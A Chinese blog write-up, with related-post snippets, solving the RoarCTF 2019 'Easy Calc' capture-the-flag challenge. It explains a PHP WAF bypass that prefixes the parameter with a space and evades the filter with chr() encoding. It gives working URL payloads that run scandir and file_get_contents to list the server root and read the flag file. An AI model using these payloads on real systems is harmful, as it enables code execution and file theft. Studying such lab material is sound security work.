[RoarCTF 2019]Easy Calc

最新推荐文章于 2022-05-22 22:11:55 发布
最新推荐文章于 2022-05-22 22:11:55 发布
阅读量212 收藏
点赞数
分类专栏: CTF题目 # buu 文章标签: php mysql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kuller_Yan/article/details/106447744
版权

[RoarCTF 2019]Easy Calc

wp from Kuller_Yan

waf和php的解码规则不同,waf不能上传字母,但是如果在前面加上空格,就可以进行绕过,然后再php解码的时候空格不影响。

首先启动靶机,查看到页面,尝试sql注入无果,观看源代码,发现calc.php访问之后出现一段php代码
在这里插入图片描述
可以看到黑名单过滤了一些字符,其中与本题相关的比较重要的就是过滤了‘/’但是我们可以用ASCII码的chr(47)代替。
先使用scandir(chr(47))查询目录下所有文件

num前面加上空格

http://node3.buuoj.cn:26806/calc.php?%20%20num=var_dump(scandir(chr(47)))

在这里插入图片描述
然后我们可以找到其中有个f1agg
然后使用file_get_contents函数将f1agg文件转换为字符串,并且用var_dump进行输出。
### 注意:f1agg用ASCII码转换之后再用

view-source:http://node3.buuoj.cn:26806/calc.php?%20%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

在这里插入图片描述

kuller_Yan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[RoarCTF 2019]Easy Calc 1
weixin_45674567的博客
06-02 2740
查看源码 于是访问calc.php试试 给num参数传字母不行 WAF的问题:WAF不允许num传入字母,那我们可以在num前加个空格来绕过WAF 这里利用PHP的字符串解析特性来绕过WAF,如 calc.php? num=phpinfo(); 知识点 扫根目录下的所有文件,也就是scandir("/") ? num=print_r(scandir('/')); 这里由于单引号被过滤了,那就用chr()绕过,chr(47)就是斜杠/ ? num=print_r(scandir(chr(47))).
BUUCTF [RoarCTF 2019]Easy Calc1
qq_35874748的博客
10-19 2973
一.打开题目后: 二.Ctrl+U查看源代码: 发现存在WAF和一个文件calc.php,这里我们就需要简单的了解下什么是WAF了: WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。 那么WAF能做什么? WAF可以过滤HTTP/HTTPS协议流量,防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击 应用交付 CC攻击:通过大量请求对应用程序资源消耗最大的应用,如...
RoarCTF 2019 Easy Calc
BlueDoorZz的博客
07-11 346
0x00 题目类型:php,RCE。 知识点:php对变量空格的解析。 0x01 查看源码,提醒有WAF保护,不过我们不知道规则。发现calc.php,对传入的num参数做了如下限制。 $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklist as $blackitem) {
【[RoarCTF 2019]Easy Calc
qq_40646572的博客
05-05 163
信息搜集 打开目标页面,搜集下可用的信息。 在文本框随便输入了点字母,发现提示。 打开页面源码,发现了提示,有waf存在。并且发现数据发送到calc.php页面,参数是num。 打开calc.php页面发现源码。 http://node4.buuoj.cn:28614/calc.php? num=phpinfo() Num参数前加一个空格。 为什么要num参数前加一个空格,是因为加一个空格为了绕过waf,在请求传递到waf层的时候,waf会检测num变量,当num前面加一个空格时,目标变量会找.
[RoarCTF 2019]Easy Calc1
weixin_61021815的博客
05-22 408
进入页面发现是一个计算器 猜测为sql注入(后来一想太过幼稚,他又不和数据库交互) 正在上传…重新上传取消 尝试了一下发现大多数字符都被过滤了 通过看被人的wp,发现可以通过抓包,发现了calc.php 访问一下 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str=$_GET['num']; $blacklist=['...
[roarctf 2019]easy calc
最新发布
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值